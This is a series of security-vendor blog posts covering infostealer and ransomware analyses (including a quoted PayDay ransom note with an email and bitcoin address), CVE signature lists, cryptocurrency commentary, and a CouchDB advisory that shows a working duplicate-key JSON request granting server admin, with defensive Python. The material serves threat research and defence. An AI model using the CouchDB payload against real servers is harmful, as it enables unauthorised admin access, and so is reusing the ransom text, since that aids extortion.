Cxor Infostealer actively spreading in the wild.

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of Cxor Malware [Cxor.A] actively spreading in the wild.

The malware gathers confidential information from the computer, such as login details, passwords and financial information, and sends it to its own C&C server.

Infection Cycle:

The malware adds the following files to the system:

  • Malware.exe
    • %Userprofile%\svchost.exe [fake svchost.exe]
    • %Userprofile%\Local Settings\Application Data\GDIPFONTCACHEV1.DAT [log data]

The malware adds the following keys to the Windows registry to ensure persistence upon reboot:

Once the computer is compromised, the malware copies its own executable to the %Userprofile% folder and runs the following commands:

A user’s data can be very valuable to an attacker, so more data translates to more profit. The main goal of this malware is to collect as much user data as possible. The malware also performs keylogging, steals clipboard data from the target and saves it in the following registry key:

Command and Control (C&C) Traffic

Cxor.A performs C&C communication over port 1177. The malware sends the victim’s system information to its own C&C server in the following format; here are some examples:

SonicWall Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Cxor.A (Trojan)

Microsoft Security Bulletin Coverage for December 2017

SonicWall has analyzed and addressed Microsoft’s security advisories for the month of December 2017. The list of issues reported, along with SonicWall coverage information, is as follows:

  • CVE-2017-11885 Windows RRAS Service Remote Code Execution Vulnerability
    IPS:7037 Suspicious SMB Traffic -ts 7

  • CVE-2017-11886 Scripting Engine Memory Corruption Vulnerability
    IPS:11665 Scripting Engine Memory Corruption Vulnerability (MS16-063) 2

  • CVE-2017-11887 Scripting Engine Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11888 Microsoft Edge Memory Corruption Vulnerability
    SPY:5049 Malformed-File html.MP.71

  • CVE-2017-11889 Scripting Engine Memory Corruption Vulnerability
    IPS:13119 Scripting Engine Memory Corruption Vulnerability (DEC 17) 10

  • CVE-2017-11890 Scripting Engine Memory Corruption Vulnerability
    IPS:13118 Scripting Engine Memory Corruption Vulnerability (DEC 17) 9

  • CVE-2017-11893 Scripting Engine Memory Corruption Vulnerability
    IPS:13117 Scripting Engine Memory Corruption Vulnerability (DEC 17) 8

  • CVE-2017-11894 Scripting Engine Memory Corruption Vulnerability
    IPS:13116 Scripting Engine Memory Corruption Vulnerability (DEC 17) 7

  • CVE-2017-11895 Scripting Engine Memory Corruption Vulnerability
    IPS:13115 Scripting Engine Memory Corruption Vulnerability (DEC 17) 6

  • CVE-2017-11899 Microsoft Windows Security Feature Bypass Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11901 Scripting Engine Memory Corruption Vulnerability
    IPS:13114 Scripting Engine Memory Corruption Vulnerability (DEC 17) 5

  • CVE-2017-11903 Scripting Engine Memory Corruption Vulnerability
    IPS:13113 Scripting Engine Memory Corruption Vulnerability (DEC 17) 4

  • CVE-2017-11905 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11906 Scripting Engine Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11907 Scripting Engine Memory Corruption Vulnerability
    IPS:13109 Scripting Engine Memory Corruption Vulnerability (DEC 17) 1

  • CVE-2017-11908 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11909 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11910 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11911 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11912 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11913 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11914 Scripting Engine Memory Corruption Vulnerability
    IPS:13110 Scripting Engine Memory Corruption Vulnerability (DEC 17) 2

  • CVE-2017-11916 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11918 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11919 Scripting Engine Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11927 Microsoft Windows Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11930 Scripting Engine Memory Corruption Vulnerability
    IPS:13111 Scripting Engine Memory Corruption Vulnerability (DEC 17) 3

  • CVE-2017-11932 Microsoft Exchange Spoofing Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11934 Microsoft PowerPoint Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11935 Microsoft Excel Remote Code Execution Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11936 Microsoft SharePoint Elevation of Privilege Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11937 Microsoft Malware Protection Engine Remote Code Execution Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11939 Microsoft Office Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11940 Microsoft Malware Protection Engine Remote Code Execution Vulnerability
    There are no known exploits in the wild.

Cryptocurrency, Ransomware and the Future of Our Economy

History is full of people who’ve labored over missed opportunities. Like all other non-bitcoin-owning people, I am one of them.

I first heard of cryptocurrency in early 2013 and scoffed at the idea that something with no intrinsic or collectable value would trade for $20. The concept of owning a portion of a cryptographic code — and it having actual value — is still hard for many to swallow.

Now that a single bitcoin (BTC) is valued at over $19,000 (USD), I lament the fact that an investment of $1,000 in 2013 would have netted me half a million dollars today. Furthermore, had I been tuned into the movement in 2010, I would be a billionaire today. You too. Stings a little, doesn’t it?

At no point in history has it been so easy to become extremely wealthy out of thin air. And it is not just people like you and me who think about this, but criminals as well. This is not only causing major shifts in financial markets, but also in malware development.

What is Cryptocurrency?

With all of the noise about cryptocurrency, here is what we know as we near 2018:

  • There are, or have been, over 1,300 other cryptocurrencies on the market. These are called altcoins.
  • Most people have never owned a single “coin” from any blockchain.
  • Most have no basis for value, which means it’s subjective and speculative (e.g., like a baseball card or an artistic sketch). The community dictates the value.
  • Some are tied to a real currency (e.g., 1 Tether coin = $1 USD).
  • Governments struggle with regulation and don’t want to encourage the use of decentralized currencies.
  • They often function like startups. Founders get an early crack at the supply chain and hold an equitable stake in the algorithm. Instead of a stock IPO they release them as part of an Initial Coin Offering (ICO).
  • Most of the popular coins cannot be mined by your computer anymore. Today, it’s only achieved through professional-grade mining operations.
  • No one knows how high or low bitcoins and cryptocurrency will go; either they will die or become the basis for our future economy.
  • The popular coins today are desired by cybercriminals and are the main form of payment within ransomware.
  • Like a TLS digital certificate, cracking the actual encryption is nearly impossible. Bitcoins are, however, fairly easy to steal and even easier to lose or destroy.
  • Malware is used to steal coins and to also turn infected endpoints into mining bots.

Bitcoin Is the Great Ransomware Enabler

Because cryptocurrency is virtually untrackable, holds great value and is easily traded online, it is the preferred way to get paid on the black market. Without the value of bitcoin, you wouldn’t have heard about ransomware.

Ransomware is responsible for causing billions of dollars (USD) in damage across the world. Furthermore, the actual cost of the problem isn’t the cost of bitcoin to return your files (if you ever get them back), but the fallout from an attack.

Ransomware is fun for the media because you can easily quantify the ransoms and take photos of the demand screens, but not so fun for hackers. Through the development, updates and propagation of the malware, only between five and 10 percent of people pay the demands. But there is another way.

Bitcoin Mining

Instead of having your victims pay you once, what about having your victims unknowingly work for you? Well, that is what a lot of malware is doing today. By leveraging a portion of your compute power to form a bitcoin mining pool, hackers don’t have to kill the goose that lays the golden egg.

The result? The home computer has less power to run normal processing and incurs higher energy costs. When this approach works its way into a corporate network, it could cause major productivity and service issues.

For some hackers, these two attack vectors are small-time thinking. Instead of counting on a distributed attack vector across a global landscape of endpoints with mixed vulnerabilities, what about a single targeted attack?

Hackers don’t attack the algorithm behind the coins; they attack where the coins are stored. Cryptocurrency banks and exchanges are ripe targets. If you factor in the price of a bitcoin (when I started writing it was $8,160; after editing it’s $16,000), the second Mt. Gox attack emptied bitcoin wallets to the tune of over $11 billion USD. Wow! At the time, the bitcoin haul was nearly 744,000 coins worth $436 million USD and caused the value of bitcoin to fall to a three-month low.

Cryptocurrency: Is it the Future?

Like most dual-sided arguments, those inside a social ecosystem are bullishly optimistic. Those outside remain pessimistic. I’m in between. I see the opportunity to capitalize on the attention, but recognize the many limitations behind cryptocurrencies that cap their viability into the future.

I’ve never owned a bitcoin coin but have entered into a few key platforms for the short-term. As mentioned, the value is purely subjective, much like an arbitrary piece of art, which can be a good investment as long as there is a large pool of people with the financial ability to support and bloat its value.

What is the difference in value between this rare Honus Wagner T206 card ($3.12 million USD) and the common Dusty Baker’s 1987 Topps card ($0.70 USD)? The answer lies in the availability of the item and the demand from the consumer.

Bitcoin, Ethereum and Monero all have value because a community of people feels it does. The more people who enter this pool, the greater the potential value. Some are investors and others are victims buying a ransom. But what truly drives the cost of bitcoin is attention — just like a piece of sports memorabilia. When you mirror Google’s search trend data to the historical price of BTC, you see a direct correlation.

What does this tell me? Once the attention fades, people will lose interest. At that point, the price will come down, similar to a Derek Jeter autographed baseball. Additionally, as ransomware becomes less effective, fewer people will buy bitcoin for the sake of digital freedom. And that freedom is the primary thing cryptocurrency can buy.

In the past year, every time the price of bitcoin dropped, the Chicken Littles of the world wanted to be the first to cry out, “The sky is falling!” I do believe there will come a time when bitcoins will have the value of the 1986 Topps Traded Pete Ladd sitting in the back of your closet (less than $1), but their value won’t crumble in a day.

With the remaining 1,000-odd altcoin cryptocurrencies (that currently hold value) out there with a collective market cap of over $400 billion (at the time of writing), it would take a lot for crypto-investors to create the fire sale needed to topple the market. Instead, I see it like the Ice Age: built in stages and then a slow recession.

The altcoins wouldn’t exist today if bitcoin wasn’t popular and a goldmine for the early investors. The creators of these algorithms are like the leaders of pyramid scams. They created the rules and the ecosystem to make money and only exist if their supporters exist, much like an Amway Double-Dutch Triple-Black Platinum Diamond Founder’s Crown Elite Wizard. These will be the first to die. The beginning of their end is when bitcoin hits a plateau lasting more than two months.

In the Ice Age analogy, bitcoin is much like a large glacier that icicles attach to. As the sun shines, they will melt, leaving only the strongest cryptocurrencies to linger. I see bitcoin and Ethereum lasting for years, but only at a small price point. The coins in active circulation will be mostly in the possession of cyber criminals (if they aren’t already) and will be sold to the victims of cybercrimes to pay ransoms until the practice to buy cryptocurrency is outlawed country by country.

And, with that, the official death of ransomware.

Death in a Cathedral

Thirty years from now when we look back at cryptocurrency, we will reminisce about the second coming of the roaring ‘20s. Without the presence of Babe Ruth and the Charleston, we’ll have great unregulated wealth that comes to a crash.

In my conservative outsider-ish advice, I recommend minor, short-term cryptocurrency investments that you are not afraid to lose. Watch the price of bitcoin. When you see a plateau lasting a month, sell. (However, I’m not a financial advisor and I have no fiduciary duties to you. Please do your own research.)

Remember the old adage: movements are built in caves and die in cathedrals. Bitcoin is in the cathedral phase of its life. And if you understand the politics and history of cathedrals, you would be wary of entry. If not, read The Gothic Enterprise: A Guide to Understanding the Medieval Cathedral. Pay attention to fallout surrounding the bankrupt Bishop Milo de Nanteuil.

The Marriage Between Malware & Cryptocurrency

Another adage I was raised with, “make hay when the sun shines,” is what hackers are doing today. As the flames of bitcoin flare, more moths will be drawn to its light. The illicit creation, extortion and theft of digital coins will drive the price to an all-time high.

Because of the outrageous volume of ransomware infections of 2016, and the infamous attacks in 2017, malware defense is at an all-time high too, but it is not enough. Network and end-point security needs to be a serious topic of discussion.

At SonicWall, we’ve made great strides to get ahead of the cryptocurrency attacks; far before a hunk of digital code was valued at dollar volumes higher than what your grandfather paid for his first home.

Before the public release of Zcash, we released the SonicWall Capture Advanced Threat Protection service, which is a cloud-based network sandbox that works in line with SonicWall next-gen firewalls to run and test suspicious code in an isolated environment to prevent newly developed ransomware attacks (and other forms of malware too).

To bolster endpoint protection, we created an alliance with SentinelOne to provide an enhanced endpoint security client framework to provide next-generation anti-virus capabilities to our current endpoint offerings.

To learn more on how SonicWall can prevent malicious attacks, please read our solution brief, Five Best Practices for Advanced Threat Protection. If you’d like to discuss this blog, the marriage between malware and cryptocurrency, and to send your potentially future-worthless digital collectibles, reach out to me on Twitter.

3 Disruptive Trends Driving Demand for Automated Cyber Security for SMBs

Organizations typically struggle to provide a holistic security posture. There are many security vendors providing exciting and innovative solutions, but from a customer perspective they often become a collection of point solutions, each solving one unique problem. This quickly becomes cumbersome, expensive and unmanageable. This blog discusses some of the most recent trends in this area, which could add even further complexity to an organization’s security posture.

IoT the new mobile?

The Internet of Things (IoT) brings the industry challenges similar to those that mobile introduced over the last eight years. These endpoints are non-general-purpose computing devices, often with a specific function, but they typically have an operating system, applications and internet access. Unlike mobile, IoT devices do not usually have the same high level of user interaction, so breaches are more likely to go unnoticed. Poor security controls can lead to events like the recent IoT botnet that caused havoc for major online services, including Twitter, Spotify and GitHub.

The industry should look to the lessons learned from securing mobile and apply them to IoT. This is most important in the consumer space, but, as with mobile, we’ll see risks arise in the commercial space as well, including HVAC, alarm systems and even POS devices.

Mobile and Desktop Convergence

More focus needs to be spent on unifying the identity, access and controls for mobile and desktop security. As this often requires custom integration across differing solutions and products, it’s difficult to maintain and troubleshoot when things go wrong.

Some solutions only focus on data protection, endpoint lockdown or only on mobile applications. By themselves, none of these go far enough, and software vendors should aim to provide more open ecosystems. By exposing well documented APIs to customers and integration partners, this would allow for better uniformity across services, with a richer workflow and improved security.

Cloud and SaaS

As we see endpoints split across mobile and desktop, customers are rapidly splitting data across a hybrid IT environment. While we expect hybrid to be the norm for many years to come, organizations need to consider how the security and usability can be blended, in a way that security controls don’t become too fragmented, or result in a poor experience for users and unmanageable for IT.

How SMBs can automate breach detection and prevention

The impact of a security breach on an SMB is significant. When large organizations detect fraudulent activity, they expect to write off a fair percentage of the cost. On the flip side, the impact of a $50,000-$200,000 incident on a small business could be enough for it to cease trading. To the attacker, SMBs are a relatively easy target, as they may not have the expertise or manpower to protect against an advanced and persistent threat.

For 25 years, SonicWall has maintained a rich security portfolio, which is primarily focused on delivering enterprise-grade security for our SMB customers. Our vision is to simplify and automate, to solve complex security challenges — all while meeting the constantly evolving threats. It’s an ongoing arms race after all!

Taking full advantage of our vast database of threat intelligence, coupled with advanced research from the SonicWall Capture Labs team, we ensure our customers of all sizes can detect and prevent these threats. The breadth and depth of our portfolio also includes products that specifically help with mobile, cloud and IoT security.

Stop ransomware and zero-day cyber attacks

One of our biggest strengths is combatting advanced persistent threats, ransomware and zero-day cyber attacks with the award-winning SonicWall Capture Advanced Threat Protection (ATP) multi-engine sandbox. Capture ATP is now available as a security service across each product in our portfolio, providing a unique protection solution across a multitude of scenarios.

Simplify endpoint protection

For endpoint protection, we are also very excited about our recent partnership agreement with SentinelOne. This brings the highest level of zero-day malware prevention on the endpoint while simplifying solutions for organizations of all shapes and sizes.

To learn more about how SonicWall helps our customers implement mobile security, download: Empowering Mobile Workforce to Collaborate Securely.

PayDay – Negotiating ransom with a ransomware operator

The SonicWall Capture Labs Threat Research Team has conducted an experimental dialog with a ransomware operator using the PayDay ransomware trojan. PayDay is a recent variant of the BTCWare ransomware trojan and has been in the wild for a few weeks. PayDay follows the current ransomware operator trend of using email to communicate with victims in order to demand payment for file decryption. The demand has increased to an astronomical 0.5 Bitcoins (roughly $8,000 USD at today’s prices). In this case, however, the price could be negotiated lower.

Infection cycle:

Upon infection the following page is displayed on the screen:

The Trojan makes the following changes to the filesystem:

  • encrypts files and adds the following extension to the filename: .[payday@rape.lol]-id-1274.wallet
  • adds %APPDATA%\Roaming\payday.hta (as seen above)
  • adds ! FILES ENCRYPTED.txt to any attached drives/network shares after encrypting files

The Trojan adds the following keys to the registry:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1payday “%APPDATA%\Roaming\payday.hta”
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 2baby “%APPDATA%\Roaming\payday.hta”

! FILES ENCRYPTED.txt contains the following message:

Good afternoon. Your computer underwent PayDay infection. All data are ciphered by a unique key which is only at us. Without unique key - files cannot be recovered.
Each 24 hours are removed 24 files. (we have their copies)
If not to start the program the decoder within 72 hours, all files on the computer are removed completely, without a possibility of recovery.
Read Attentively instructions how to recover all ciphered data.
PayDay
------------------------------------------------------
You will be able to recover files so:
1. to contact us by e-mail: payday@rape.lol
- you send your ID identifier and 2 files, up to 1 MB in size everyone.
We decipher them, as proof of a possibility of interpretation.
also you receive the payment instruction. (payment will be in bitcoin)
- report your ID and we will switch off any removal of files (if do not report your ID identifier, then each 24 hours will be to be removed on 24 files. If report to ID-we will switch off it)
2. you pay and confirm payment.
3. after payment you receive the program the decoder. Which will recover your data and will switch off function of removal of files.
------------------------------------------------------
You have 48 hours on payment.
If you do not manage to pay in 48 hours, then the price of interpretation increases twice.
To recover files, without loss, and on the minimum rate, you have to pay within 48 hours.
Address for detailed instructions e-mail: payday@rape.lol

We followed the instructions and sent an email attached with 2 encrypted files to payday@rape.lol. In under 10 minutes we received the following response:

The response included an attachment to one of the encrypted files that we sent for decryption. Although the file content had changed, it remained encrypted. Perhaps the operator had used the wrong key. The response also contained an unused (probably freshly generated) bitcoin address for receiving funds: 1PKxaj5JSuZnUE8rLcgLTd7vGDJoNgQQda.

The conversation continued:

“that I would prepare an instrument” ?? Perhaps a job for a seasoned forensic linguistics team. However, what is more interesting is that the operator is prepared to negotiate the price for decryption and accept my 50% discount offer:

The operator begins to show signs of impatience and offers additional help in my request to (obviously not) pay him via PayPal:

We make a brash attempt to obtain an IP address associated with the operator by causing him to visit a webserver under our control:

Moments later access logs reveal a visit from an IP address located in the Czech Republic. After perhaps realizing his mistake, there were subsequent visits from IP addresses located in multiple countries around the world.

This, however, may be the operator’s attempt to obfuscate his tracks after visiting the site directly the first time.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: PayDay.RSM (Trojan)

Apache CouchDB JSON Remote Privilege Escalation

Apache CouchDB is open source database software that focuses on ease of use and having a scalable architecture. It has a document-oriented NoSQL database architecture and is implemented in the concurrency-oriented language Erlang; it uses JSON to store data, JavaScript as its query language using MapReduce, and HTTP for an API.

A privilege escalation vulnerability exists in CouchDB. The vulnerability is due to a discrepancy between the behaviour of the JavaScript JSON parser, used in design documents, and the Jiffy JSON parser, used within the Erlang-based CouchDB internals, which allows an attacker to bypass user access control.

Vulnerability details

CouchDB has its own web interface for interacting with the REST API. Both interfaces listen on port 5984/TCP by default. The URL for opening its GUI is: http://:5984/_utils

To send an API request, a user sends an HTTP request such as the following, carrying the parameters in a JSON body. For example:

PUT /_users/org.couchdb.user:new_user HTTP/1.1
Host: localhost:5984
Content-Type: application/json
Content-Length: 80

{
  "type": "user",
  "name": "[username]",
  "roles": [],
  "password": "[password]"
}

When a JSON object has duplicate keys, a standard JSON parser assigns only the last value. For example, the JSON {"key":"value1","key":"value2"} assigns value2 to key. When CouchDB handles such an API request, the JavaScript function validate_doc_update() is called to verify the current user’s privilege, and it sees the last value. However, the CouchDB internals use the Erlang get_value() function, which returns only the first value of a given key. So the validator checks one value of roles while the internals act on another:

{
  "type": "user",
  "name": "[username]",
  "roles": ["_admin"],
  "roles": [],
  "password": "[password]"
}

Such a request submits a malicious document to the _users or _replicator database and escalates the user’s privilege to CouchDB server admin.
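To make the parser discrepancy concrete, here is an added Python illustration; it is not CouchDB’s own code (CouchDB is Erlang and JavaScript), and the user name, password and request body are constructed. A last-wins parser stands in for the JavaScript validator, a first-wins parser stands in for the Erlang get_value() path, and a strict parser rejects duplicate keys outright, which is the defensive fix.

```python
import json

# Constructed request body modelled on the duplicate-"roles" document above.
# Name and password are placeholders, not values from a real deployment.
DUPLICATE_ROLES_DOC = (
    '{"type": "user", "name": "new_user", '
    '"roles": ["_admin"], "roles": [], "password": "placeholder"}'
)


def parse_last_wins(text):
    """Standard JSON behaviour (JavaScript JSON.parse, Python json.loads):
    for a repeated key the last value wins."""
    return json.loads(text)


def parse_first_wins(text):
    """Emulates reading an Erlang proplist with get_value/2: the first
    occurrence of a key is returned and later duplicates are ignored."""
    def first_wins(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)   # keep the first, drop later duplicates
        return out
    return json.loads(text, object_pairs_hook=first_wins)


def parse_strict(text):
    """Hardened parser: refuse any object that repeats a key, so the two
    sides of the system can never disagree about what was submitted."""
    def reject_duplicates(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                raise ValueError(f"duplicate key {key!r} in JSON object")
            seen.add(key)
        return dict(pairs)
    return json.loads(text, object_pairs_hook=reject_duplicates)


def validate_user_doc(doc, requester_is_admin):
    """Mirrors the intent of the _users validate_doc_update check:
    only an admin may assign roles to a user document."""
    if doc.get("type") != "user":
        return False
    if doc.get("roles") and not requester_is_admin:
        return False
    return True


def roles_seen_by_each_side(text):
    """Return (validator view, internals view) of the roles field."""
    return parse_last_wins(text)["roles"], parse_first_wins(text)["roles"]


def accept_user_doc(text, requester_is_admin):
    """Hardened request path: strict parse first, then validate.
    Returns True only for a well-formed document the requester may submit."""
    try:
        doc = parse_strict(text)
    except ValueError:
        return False
    return validate_user_doc(doc, requester_is_admin)


if __name__ == "__main__":
    validator_view, internals_view = roles_seen_by_each_side(DUPLICATE_ROLES_DOC)
    print("validator sees roles =", validator_view)    # []
    print("internals see roles =", internals_view)     # ['_admin']
    print("strict path accepts? ", accept_user_doc(DUPLICATE_ROLES_DOC, False))
```

The validator passes the document because it sees an empty roles list, while the internals store the first value; the strict parser closes the gap by rejecting the document before either side looks at it.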

SonicWall Capture Labs Threat Research team has developed the following signature to identify and stop the attacks:

  • IPS 13106: Apache CouchDB JSON Remote Privilege Escalation

SonicWall MAPP

SonicWall is a participant in the Microsoft Active Protections Program (MAPP). Through this program, SonicWall Unified Threat Management provides comprehensive, accurate and timely protection for Microsoft products.

SonicWall has released technical articles for Microsoft advisories, listed below:

Civilian Casualties in the Cyberwar

Have you been the victim of cybercrime? If I asked you that question in 2012, you might have said, “I’m not sure.” But in 2017, I am sure your answer is, “Yes, I’ve been victimized many times.” That’s bad news.

I joined SonicWall in 2012 and witnessed firsthand the rise of cybercrime headlines occurring on a monthly, weekly, and now daily basis. Among the familiar companies that have been breached over those five years are Target, Home Depot, eBay, PayPal, LinkedIn, Anthem, Yahoo, iCloud, Dropbox, Evernote, and Equifax. If you use any of these, then you have been an indirect victim of cybercrime and undoubtedly, most of your personal information is somewhere on the Dark Web.

According to http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/ the last five years has seen an escalation of cybercrime on the scale of a world-wide cyberwar. The weapons of this cyberwar are simple and inexpensive to make and deliver compared to conventional weapons. This is due to the ubiquity and connectedness of the Internet that is at once its strength and its weakness. The ubiquity of the internet is a strength in that it enables a free exchange of information and commerce by connecting individuals, businesses, and governments. Yet, this connectedness is a weakness in that it enables criminal, espionage, and terrorist organizations to directly victimize the public, enterprises, and nations on a global scale.

Should you resign yourself to being a casualty in the cyberwar? Go off the grid and forgo connected technologies? Neither of these options is acceptable for those who desire the convenience that comes with technical innovations such as Alexa and Nest. Then should you hack back? We don’t recommend it since that would be like a civilian joining a conventional war with a pellet gun – you’d have little to gain and much to lose.

In the cyberwar, you are more secure as a non-combatant, but that does not mean you need to be a passive participant. Instead, make sure you have a good defense. If hackers are climbing a ladder to get to you, then build a wall that is higher than their ladder. Windows and MacOS Firewall are defensive tactics, but they are dated architectures that are easy to penetrate. Firewalls in antivirus and wireless routers are marginally better than Windows and MacOS, but they are still not enough to thwart hackers in today’s cyberthreat environment.

To be safe in the cyberwar of 2017, use a next-generation firewall (NGFW) running a full suite of security services. Unlike less sophisticated firewalls, NGFWs are not static; they learn and grow higher over time, staying higher than the ladders that the hackers are building. The SonicWall Capture Threat Network updates signatures globally around the clock to keep your firewall “higher than the hacker’s ladders.” And if they happen to put a ladder where you didn’t expect one (with a zero-day or unknown malware), you can use Capture ATP to “push away that ladder” before the threat can enter your network.

Tomorrow will bring news of another organization that has been hacked, but you can securely protect the data and devices on your network and avoid being a casualty of the cyberwar. Download – 8 Ways to Protect Your Network Against Ransomware.

How SonicWall Signature “Families” Block Emerging Ransomware Variants

When you look at the most damaging network security invasions over the last year, you see a recurring pattern: leaked government cyber tools being repurposed by cybercriminals. The compromised NSA toolset leaked by Shadow Brokers was devastating in many respects. These were highly targeted tools that many nation states wish they had the operational capacity to deploy.

But the tools developed by the NSA fell into criminal hands, who used them not for state-backed cyber espionage, but for capital gain. They repurposed these tools into WannaCry, Petya and, most recently, BadRabbit, as a means to install ransomware, encrypt information and keep it hostage until a targeted victim pays to release it, typically via Bitcoin.

Alas, sometimes victims pay and the data is still not released. Sometimes other actors see that an organization has been held hostage and send their own ransom demands, even though they are not affiliated with the original ransomware creators. The victim organization pays for this misdirection but still cannot unlock its files. It is out the money and damages are incurred. “There is no honor among thieves,” as they say.

WannaCry, Petya and BadRabbit form a "family" of ransomware variants built on the same leaked NSA exploits. It is precisely when multiple attacks use the same family of exploits that SonicWall can give you breathing room and help you sleep at night.

To explain, first let me describe how signatures work in our next-generation firewalls (NGFWs). An individual signature matches a specific byte pattern in a packet payload to detect one particular variant of malware. Our award-winning Capture ATP technology, a multi-engine network sandbox, not only stops unknown and zero-day threats from entering networks, but also helps create new signatures for detecting emerging malware.

Few vendors inspect both incoming and outgoing packets for malware, because doing both can carry a large performance cost. Most vendors are only concerned with traffic going from the internet to the trusted zones and inspect only that direction. SonicWall inspects every packet in each direction.

Why? If you own a network and a device on it is somehow compromised, the only way you will find out is by watching what it sends out. Is it talking to a command-and-control (C&C) server? Is it sending malware out, as infected machines do? Without scanning every packet you have no visibility into your internal network. Blocking incoming malware is important, but so is determining which machines may already be infected and are trying to send data outside your organization.

This brings us back to our "family" of signatures. Have you ever wondered why SonicWall's names for well-known malware strains differ from those used by other vendors? It is because we often find them first and give them our own names. Other vendors do this too, but our approach is very different. I am proud to say that SonicWall is extremely competent at building a family of signatures that covers many individual signatures in one pass. As packets pass through the NGFW, a single fast memory-tree lookup against the family is all that is needed. This is an extremely fast way to process traffic.

Sometimes in sales we have to quote statistics in answer to questions such as "How many signatures do you store on the firewall?" We dutifully respond, "Over 32,000 locally, with more in the cloud." But this tells only part of the story. With signature families, one family can catch 100 or more variations of a single threat.
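To make the "one lookup for a whole family" idea concrete, here is an added illustration of single-pass multi-pattern matching with an Aho-Corasick automaton (a trie with failure links). This is not SonicWall's engine, whose internals are not public, and the family patterns and packet payload below are constructed placeholders, not real signatures or captured traffic. The point it shows is that every member of the family is found in one scan of the payload, even when the patterns overlap each other.

```python
"""Single-pass multi-pattern matching with an Aho-Corasick automaton.

Added illustration, not SonicWall's signature engine. The family below is a
constructed placeholder: the pattern bytes are not real signatures, and the
sample payload is not captured traffic.
"""
from collections import deque


class SignatureFamily:
    """A named set of byte patterns compiled into one automaton.

    One pass over a payload reports every pattern in the family that occurs
    in it, including patterns that overlap each other.
    """

    def __init__(self, family_name, patterns):
        self.family_name = family_name
        self.patterns = dict(patterns)            # signature name -> bytes
        self.goto = [{}]                          # node -> {byte: child}
        self.fail = [0]                           # node -> failure node
        self.output = [[]]                        # node -> names ending here
        for name, pat in self.patterns.items():
            self._insert(name, pat)
        self._build_failure_links()

    def _insert(self, name, pat):
        node = 0
        for byte in pat:
            child = self.goto[node].get(byte)
            if child is None:
                child = len(self.goto)
                self.goto.append({})
                self.fail.append(0)
                self.output.append([])
                self.goto[node][byte] = child
            node = child
        self.output[node].append(name)

    def _build_failure_links(self):
        # Breadth-first so every node's failure target is already finished.
        queue = deque()
        for child in self.goto[0].values():
            queue.append(child)                   # depth-1 nodes fail to root
        while queue:
            node = queue.popleft()
            for byte, child in self.goto[node].items():
                queue.append(child)
                f = self.fail[node]
                while f and byte not in self.goto[f]:
                    f = self.fail[f]
                self.fail[child] = self.goto[f].get(byte, 0)
                # A match ending at the failure node also ends here.
                self.output[child].extend(self.output[self.fail[child]])

    def scan(self, payload):
        """Return [(start_offset, signature_name), ...] in order of match end."""
        hits = []
        node = 0
        for i, byte in enumerate(payload):
            while node and byte not in self.goto[node]:
                node = self.fail[node]
            node = self.goto[node].get(byte, 0)
            for name in self.output[node]:
                hits.append((i - len(self.patterns[name]) + 1, name))
        return hits


# Constructed placeholder family: B deliberately overlaps the tail of A.
EXAMPLE_FAMILY = SignatureFamily("Ransom.Example", {
    "Ransom.Example.A": b"EXAMPLE_DROPPER_V1",
    "Ransom.Example.B": b"DROPPER_V1_PAYLOAD",
    "Ransom.Example.C": b"\x90\x90\x90\xe8\x00\x00\x00\x00",
})

# Constructed sample payload containing all three patterns.
SAMPLE_PAYLOAD = b"\x00" * 4 + b"EXAMPLE_DROPPER_V1_PAYLOAD" + b"\x90\x90\x90\xe8\x00\x00\x00\x00"


def family_hits(family, payload):
    """Names of every family member present in the payload, deduplicated."""
    return sorted({name for _, name in family.scan(payload)})


if __name__ == "__main__":
    for offset, name in EXAMPLE_FAMILY.scan(SAMPLE_PAYLOAD):
        print(f"{name} at offset {offset}")
```

The payload is walked exactly once; a new variant is covered by adding its bytes to the family and rebuilding the automaton, with no extra scan per pattern.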

Going back to WannaCry, SonicWall created a family that caught WannaCry right after it was announced to the public. Because Petya and BadRabbit reused the same leaked exploits, the family signature already in your SonicWall firewall blocked these new attack vectors as well.

Even though these new variants were delivered to networks through separate targeted campaigns, SonicWall blocked all of their different byte patterns as part of our WannaCry signature family. The signature updates were performed in the background, while you enjoyed the holidays with your friends and family.

Fake coupon downloads Cobalt Strike to take control of your system

With the holiday shopping season in full swing, cybercriminals are taking advantage of the fact that consumers are expected to hunt for deals over the next few weeks. During this Cyber Week sales period, the SonicWall Capture Labs Threat Research Team spotted a specially crafted document file posing as a coupon that promises big savings on all items at major online retailers such as Amazon, eBay and AliExpress. The infection executes and downloads multiple layers of scripts to carry out the full attack.

Infection cycle:

The file arrives as a document file.

The text in the document asks the user to click on an image to access the coupon. Doing so launches a VBScript file named "Coupon code .vbs".

